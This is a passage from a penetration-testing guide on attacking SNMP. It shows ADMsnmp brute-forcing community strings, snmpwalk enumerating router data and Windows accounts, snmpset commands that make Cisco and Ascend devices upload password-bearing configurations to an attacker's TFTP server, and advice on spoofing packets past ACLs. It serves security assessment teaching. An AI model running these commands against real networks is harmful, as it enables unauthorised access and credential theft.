The Simple Network Management Protocol (SNMP) service listens on UDP port 161. SNMP is often found running on network infrastructure devices such as managed switches, routers, and other appliances. Increasingly, SNMP can be found running on Unix-based and Windows servers for central network management purposes. SNMP authentication is very simple and is sent across networks in plaintext. SNMP Management Information Base (MIB) data can be retrieved from a device by specifying the correct read community string, and SNMP MIB data can be written to a device using the correct write community string. MIB databases contain listings of Object Identifier (OID) values, such as routing table entries, network statistics, and details of network interfaces. Accessing a router MIB is useful when performing further network reconnaissance and mapping. Two useful tools used by attackers and security consultants alike for brute-forcing SNMP community strings and accessing MIB databases are ADMsnmp and snmpwalk. 5.6.1 ADMsnmpADMsnmp is available from the ADM group home page at http://adm.freelsd.net/ADM/. The utility is an effective Unix command-line SNMP community string brute-force utility. Example 5-13 shows the tool in use against a Cisco router at 192.168.0.1 to find that the community string private has write access. Example 5-13. ADMsnmp used to brute-force SNMP community strings# ADMsnmp 192.168.0.1 ADMsnmp vbeta 0.1 (c) The ADM crew ftp://ADM.isp.at/ADM/ greets: !ADM, el8.org, ansia >>>>>>>>>>> get req name=root id = 2 >>>>>>>>>>> >>>>>>>>>>> get req name=public id = 5 >>>>>>>>>>> >>>>>>>>>>> get req name=private id = 8 >>>>>>>>>>> >>>>>>>>>>> get req name=write id = 11 >>>>>>>>>>> <<<<<<<<<<< recv snmpd paket id = 9 name = private ret =0 <<<<<<<<< >>>>>>>>>>>> send setrequest id = 9 name = private >>>>>>>> >>>>>>>>>>> get req name=admin id = 14 >>>>>>>>>>> <<<<<<<<<<< recv snmpd paket id = 10 name = private ret =0 <<<<<<<< >>>>>>>>>>> get req name=proxy id = 17 >>>>>>>>>>> <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<< >>>>>>>>>>> get req name=ascend id = 20 >>>>>>>>>>> <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<< >>>>>>>>>>> get req name=cisco id = 23 >>>>>>>>>>> >>>>>>>>>>> get req name=router id = 26 >>>>>>>>>>> >>>>>>>>>>> get req name=shiva id = 29 >>>>>>>>>>> >>>>>>>>>>> get req name=all private id = 32 >>>>>>>>>>> >>>>>>>>>>> get req name= private id = 35 >>>>>>>>>>> >>>>>>>>>>> get req name=access id = 38 >>>>>>>>>>> >>>>>>>>>>> get req name=snmp id = 41 >>>>>>>>>>> <!ADM!> snmp check on pipex-gw.trustmatta.com <!ADM!> sys.sysName.0:pipex-gw.trustmatta.com name = private write access 5.6.2 snmpwalkThe snmpwalk utility is part of the Net-SNMP (previously UCD-SNMP) suite of tools available from http://net-snmp.sourceforge.net. The Net-SNMP toolkit can be built on both Unix and Windows platforms and contains other useful utilities including snmpset, which can modify and set specific OID values. snmpwalk is used with a valid community string to download the entire MIB database from the target device (unless a specific OID value to walk is provided by the user). Example 5-14 shows snmpwalk being used to download the MIB database from a Cisco router. The MIB in this example is over seven pages in length, so for brevity, only the first eight OID values are presented here. Example 5-14. Accessing the MIB using snmpwalk# snmpwalk -c public 192.168.0.1 system.sysDescr.0 = Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IS-M), Version 12.0(6), RELEASE SOFTWARE (fc1) Copyright (c) 1986-1999 by cisco Systems, Inc. Compiled Wed 11-Aug-99 00:16 by phanguye system.sysObjectID.0 = OID: enterprises.9.1.186 system.sysUpTime.0 = Timeticks: (86128) 0:14:21.28 system.sysContact.0 = system.sysName.0 = pipex-gw.trustmatta.com system.sysLocation.0 = system.sysServices.0 = 78 system.sysORLastChange.0 = Timeticks: (0) 0:00:00.00 5.6.3 Default Community StringsMost routers, switches, and wireless access points from Cisco, 3Com, Foundry, D-Link, and other companies use public and private as their respective default read and write SNMP community strings. The community string list provided with the ADMsnmp brute-force program includes cisco, router, enable, admin, read, write, and other obvious values. When assessing routers or devices belonging to a specific organization, you should tailor your list accordingly (including the company name and other values that may be used in that instance).
5.6.4 Compromising Devices by Reading from SNMPMany Windows NT and 2000 servers run SNMP services, using the community string of public for read access. By walking through the 1.3.6.1.4.1.77.1.2.25 OID within a Windows NT or 2000 server, you can enumerate usernames of active accounts on the target host; 192.168.0.251 is used in Example 5-15. Example 5-15. Enumerating Windows 2000 user accounts through SNMP# snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25 enterprises.77.1.2.25.1.1.101.115.115 = "Chris" enterprises.77.1.2.25.1.1.65.82.84.77.65.78 = "IUSR_CARTMAN" enterprises.77.1.2.25.1.1.65.82.84.77.65.78 = "IWAM_CARTMAN" enterprises.77.1.2.25.1.1.114.97.116.111.114 = "Administrator" enterprises.77.1.2.25.1.1.116.85.115.101.114 = "TsInternetUser" enterprises.77.1.2.25.1.1.118.105.99.101.115 = "NetShowServices" In this example, the usernames Chris and Administrator are identified, along with the built-in Windows IUSR_hostname, IWAM_hostname, TsInternetUser, and NetShowServices users.
SNMP OID values can be fed to tools such as snmpwalk in both numerical and word form. Table 5-2 lists values that are useful when enumerating services and open shares of Windows NT family servers found running SNMP.
5.6.5 Compromising Devices by Writing to SNMPIt is possible to compromise a Cisco IOS or Ascend device running SNMP if you have write access to the SNMP MIB. By first running a TFTP server on an accessible host, you can modify particular OID values on the target device over SNMP (using snmpset), so that the device configuration file containing direct access passwords can be uploaded through TFTP. Here are some examples of this attack against Cisco IOS and Ascend network devices: Compromising a Cisco device using snmpset: # snmpset -r 3 -t 3 192.168.0.1 private .1.3.6.1.4.1.9.2.1.55.192.\ 168.0.50 s "cisco-config" Compromising an Ascend device using snmpset: # snmpset -r 3 -t 3 192.168.0.254 private .1.3.6.1.4.1.529.9.5.3.0\ a "192.168.0.50" # snmpset -r 3 -t 3 192.168.0.254 private .1.3.6.1.4.1.529.9.5.4.0\ s "ascend-config" For these attacks to work, you must install and configure an accessible TFTP server to which the appliance can upload its configuration file. This can be achieved from a Unix-based platform by modifying the /etc/inetd.conf file to run tftpd from inetd, or by using a Windows TFTP server, such as the Cisco TFTP Server (available from http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp). One key point to remember when performing this exploit is to ensure your TFTP server is writable so that the target device can upload its configuration file! SNMP running on hardware appliances can be imaginatively abused by writing to a plethora of different OID values (e.g., modification of routing tables or uploading new firmware and configuration files). It is often best to test SNMP attacks in a lab environment before performing them on live networks, to avoid crashing routers, switches, and other critical infrastructure devices. A damaging extension to attacks involving writing to remote devices via SNMP is to use UDP spoofing. If the SNMP service listening on the target router doesn't respond to packets sent from the attacker's Internet-based hosts, he can spoof the snmpset command string (as in the previous command-line examples) to appear from a trusted host, such as an external firewall IP address. Obviously, he would need to find the correct community string, but it certainly is an imaginative way around the host-based ACLs of the router. 5.6.6 SNMP Process-Manipulation VulnerabilitiesSNMP services running as part of Compaq Insight Manager and various firmware found running on hardware such as Linksys routers, Compaq, and ORiNOCO wireless access points are publicly known to be vulnerable to various simple and complex process-manipulation attacks. In February 2002, CERT issued an advisory detailing multiple vulnerabilities in many SNMP implementations, accessible at http://www.cert.org/advisories/CA-2002-03.html. On Solaris and Unix-based platforms, at least, these vulnerabilities resulted in compromises occurring. Many operating systems and software suites were affected, including systems from the following vendors:
For current information relating to known SNMP issues, search the MITRE CVE list or check sites such as CERT or ISS X-Force. At the time of writing, the CERT knowledge base at http://www.kb.cert.org/vuls/ lists several remotely exploitable vulnerabilities in SNMP (not including denial of service or locally exploitable bugs), as shown in Table 5-3.
|